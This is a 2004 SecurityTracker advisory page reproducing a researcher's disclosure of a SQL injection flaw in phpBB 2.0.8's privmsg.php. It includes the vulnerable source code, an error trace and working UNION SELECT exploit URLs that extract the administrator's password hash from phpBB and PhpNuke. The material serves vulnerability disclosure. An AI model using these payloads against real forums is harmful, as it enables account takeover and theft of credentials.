Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
phpBB Input Validation Flaw in 'privmsg.php' Lets Remote Users Inject SQL Commands
|
|
SecurityTracker Alert ID: 1009563
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Mar 26 2004
|
Impact: Disclosure of user information, Execution of arbitrary code via network
|
Exploit Included: Yes
|
Version(s): 2.0.8
|
Description: An input validation vulnerability was reported in phpBB in the 'privmsg.php' script. A remote user can inject SQL commands.
Janek Vind (waraxe) reported that 'privmsg.php' does not properly validate the pm_sql_user variable when the 'folder' variable is
set to 'savebox'. A remote user can supply a specially crafted value to execute SQL commands on the database.
A demonstration
exploit URL to retrieve the administrator's hashed password is provided:
http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.priv
msgs_type=-99%20UNION%20SELECT%20username,null,use
ll,null,null,null,null,null,null,null,null,null FROM phpbb_users WHERE user_level=1
LIMIT 1/*
|
Impact: A remote user can inject SQL commands to be executed on the underlying database.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.phpbb.com/ (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: Janek Vind <come2waraxe@yahoo.com>
|
Message History:
None.
|
Source Message Contents
|
Date: 26 Mar 2004 17:27:40 -0000
From: Janek Vind <come2waraxe@yahoo.com>
Subject: [waraxe-2004-SA#013 - Critical sql injection bug in PhpBB 2.0.8
|
{================================================================================}
{ [waraxe-2004-SA#013] }
{================================================================================}
{ }
{ [ Critical sql injection bug in PhpBB 2.0.8 and in older versions ] }
{ }
{================================================================================}
Author: Janek Vind "waraxe"
Date: 26. March 2004
Location: Estonia, Tartu
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PhpBB is widely used and very popular forum software, written in php.
Homepage: http://www.phpbb.com/
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PhpBB 2.0.x is written very carefully and securely. But even there can be bugs, which
will give to potential malicious attacker sensitive information from database - admin's
username and password's md5 hash.
So, let's look at original code from privmsg.php line 189:
*************************************************************************************
// SQL to pull appropriate message, prevents nosey people
// reading other peoples messages ... hopefully!
//
switch( $folder )
{
case 'inbox':
$l_box_name = $lang['Inbox'];
$pm_sql_user = "AND pm.privmsgs_to_userid = " . $userdata['user_id'] . "
AND ( pm.privmsgs_type = " . PRIVMSGS_READ_MAIL . "
OR pm.privmsgs_type = " . PRIVMSGS_NEW_MAIL . "
OR pm.privmsgs_type = " . PRIVMSGS_UNREAD_MAIL . " )";
break;
case 'outbox':
$l_box_name = $lang['Outbox'];
$pm_sql_user = "AND pm.privmsgs_from_userid = " . $userdata['user_id'] . "
AND ( pm.privmsgs_type = " . PRIVMSGS_NEW_MAIL . "
OR pm.privmsgs_type = " . PRIVMSGS_UNREAD_MAIL . " ) ";
break;
case 'sentbox':
$l_box_name = $lang['Sentbox'];
$pm_sql_user = "AND pm.privmsgs_from_userid = " . $userdata['user_id'] . "
AND pm.privmsgs_type = " . PRIVMSGS_SENT_MAIL;
break;
case 'savebox':
$l_box_name = $lang['Savebox'];
$pm_sql_user .= "AND ( ( pm.privmsgs_to_userid = " . $userdata['user_id'] . "
AND pm.privmsgs_type = " . PRIVMSGS_SAVED_IN_MAIL . " )
OR ( pm.privmsgs_from_userid = " . $userdata['user_id'] . "
AND pm.privmsgs_type = " . PRIVMSGS_SAVED_OUT_MAIL . " )
)";
break;
default:
message_die(GENERAL_ERROR, $lang['No_such_folder']);
break;
}
//
// Major query obtains the message ...
//
$sql = "SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.
user_id AS user_id_2, u.user_sig_bbcode_uid,
u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_
regdate, u.user_msnm, u.user_viewemail,
u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text
FROM " . PRIVMSGS_TABLE . " pm, " . PRIVMSGS_TEXT_TABLE . " pmt, " . USERS
_TABLE . " u, " . USERS_TABLE . " u2
WHERE pm.privmsgs_id = $privmsgs_id
AND pmt.privmsgs_text_id = pm.privmsgs_id
$pm_sql_user
AND u.user_id = pm.privmsgs_from_userid
AND u2.user_id = pm.privmsgs_to_userid";
*****************************************************************************
As we can see, for some reason there is "$pm_sql_user .=" in case of 'savebox'. Funny thing
is, that
this little bug can open critical security hole to forum. First, let's try this:
http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=foobar
and we get error message:
General Error
Could not query private message post information
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax. Check the manual that corresponds to your MySQ
L server version for the right
syntax to use near 'foobarAND ( ( pm.privmsgs_to_userid = 2 AND pm.privmsgs_t
SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS use
r_id_2, u.user_sig_bbcode_uid,
u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_
regdate, u.user_msnm, u.user_viewemail,
u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text FROM phpbb_
privmsgs pm, phpbb_privmsgs_text
pmt, phpbb_users u, phpbb_users u2 WHERE pm.privmsgs_id = 99 AND pmt.privmsgs_text_id = pm.privmsgs_
id foobarAND ( ( pm.privmsgs_to_userid
= 2 AND pm.privmsgs_type = 3 ) OR ( pm.privmsgs_from_userid = 2 AND pm.privmsgs_type = 4 ) ) AND u.u
ser_id = pm.privmsgs_from_userid
AND u2.user_id = pm.privmsgs_to_userid
Line : 238
File : D:\apache_wwwroot\phpbb206c\privmsg.php
Next, if we request this:
http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm
.privmsgs_type=-99%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null/*
then we don't get any error messages. Now it's time to do something "useful":
********************[real-life sploit]********************
http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm
.privmsgs_type=-99%20UNION%20SELECT%20username,null,user_password,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,nu
ll,null,null,null,null,null,null,null,null,null FROM phpbb_users WHERE user_level=1 LIMIT 1/*
********************[/real-life sploit]*******************
and we will see in plaintext admin's username and password's md5 hash ;)
And to all PhpNuke 6.x and 7.x users, here is something for you:
http://localhost/nuke69j1/modules.php?name=Private_Messages&file=index&folder=savebox&mod
e=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20nuke_authors%20WHERE%20radm
insuper=1%20LIMIT%201/*
Post Scriptum:
I really enjoy reading of the PhpBB 2.x code, because it is written with good style and it's
very secure. To all php programmers - I recommend to read the file "docs\codingstandards.htm"
from
phpbb package, it will help to learn good style of the programming!
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to torufoorum members and to all bugtraq readers in Estonia! Tervitused!
Special greets to Stefano from UT Bee Clan!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
---------------------------------- [ EOF ] ------------------------------------
|
|
Go to the Top of This SecurityTracker Archive Page
|
